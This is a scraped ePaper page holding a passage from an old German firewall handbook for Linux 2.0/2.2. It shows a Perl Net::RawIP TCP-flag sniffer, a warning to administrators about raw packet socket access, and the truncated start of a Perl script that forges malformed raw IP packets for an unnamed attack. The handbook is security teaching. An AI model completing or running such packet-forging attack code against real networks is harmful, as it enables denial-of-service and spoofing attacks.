05.02.2013 Aufrufe

Firewall Handbuch für LINUX 2.0 und 2.2 - zurück

Firewall Handbuch für LINUX 2.0 und 2.2 - zurück

Firewall Handbuch für LINUX 2.0 und 2.2 - zurück

MEHR ANZEIGEN
WENIGER ANZEIGEN

Erfolgreiche ePaper selbst erstellen

Machen Sie aus Ihren PDF Publikationen ein blätterbares Flipbook mit unserer einzigartigen Google optimierten e-Paper Software.

Erstellt von Doc Gonzo - http://kickme.to/plugins<br />

loop $pcap,$opt_n,\,\@a;<br />

}<br />

else {<br />

$b = new Net::RawIP;<br />

my $pcap = $b->pcapinit($device,$filter1,$psize,$timeout);<br />

loop $pcap,$opt_n,\,\@a;<br />

}<br />

sub cl {<br />

$a->bset(substr( $_[2],14));<br />

my @fl = $a->get({tcp=><br />

[qw(psh syn fin rst urg ack)]<br />

});<br />

print "Client -> ";<br />

map { print "$flags[$_] " if $fl[$_] } (0..5);<br />

print "\n"<br />

}<br />

sub sv {<br />

$b->bset(substr( $_[2],14));<br />

my @fl = $b->get({tcp=><br />

[qw(psh syn fin rst urg ack)]<br />

});<br />

print "Server -> ";<br />

map { print "$flags[$_] " if $fl[$_] } (0..5);<br />

print "\n";<br />

}<br />

Das folgende Beispiel funktioniert eventuell auf einigen UNIX'en nicht, darunter <strong>LINUX</strong> <strong>2.2</strong><br />

<strong>und</strong> BSD UNIX'e. Der Gr<strong>und</strong> ist folgender: Die Distributoren haben sich darauf geeinigt,<br />

daß der Schaden von irgendwelchen Lamern groß genug sei. Im Kernel von UNIX, <strong>LINUX</strong><br />

<strong>2.2</strong>, NT <strong>und</strong> Windows 95/98 Service Packs wurde also ein Prüfsummencheck eingebaut,<br />

der verhindert, daß solche bösartigen Pakete die Netzwerkkarte/ISDN Karte verlassen.<br />

Unter <strong>LINUX</strong> müssen Sie im Kernel den direkten Zugriff auf das Netzwerkdevice im Kernel<br />

aktivieren: Config Paket Socket=Y, Config Netlink Socket=Y. Damit haben dann sogar<br />

einfache User direkten Zugriff auf die Netzwerkkarte....Systemadministratoren also<br />

aufgepasst ! Diese Option sollte man stets deaktiviert haben, ansonsten können Nutzer<br />

von CGI-BIN's von Ihrem WWW-Server aus diese Angriffe ausführen....was sicher zu<br />

Ärger führt...<br />

Bei dem folgenden Beispiel dürfen Sie nun selber raten, welcher Angriff hier ausgeführt<br />

wird. Beachten Sie hierzu die Möglichkeiten, die saddr zu verändern <strong>und</strong> die TCP/IP Flags<br />

zu variieren.....<br />

#!/usr/bin/perl<br />

require 'getopts.pl';<br />

use Net::RawIP;<br />

Getopts('t:n:');<br />

die "Usage $0 -t -n " unless ($opt_t && $opt_n);<br />

@data = split (//,"0"x20);<br />

$p = new Net::RawIP({<br />

ip => {<br />

ihl => 11,<br />

tot_len => 44,<br />

tos => 0,<br />

ttl => 255,<br />

id => 1999,<br />

frag_off => 16383,<br />

protocol => 17,

Hurra! Ihre Datei wurde hochgeladen und ist bereit für die Veröffentlichung.

Erfolgreich gespeichert!

Leider ist etwas schief gelaufen!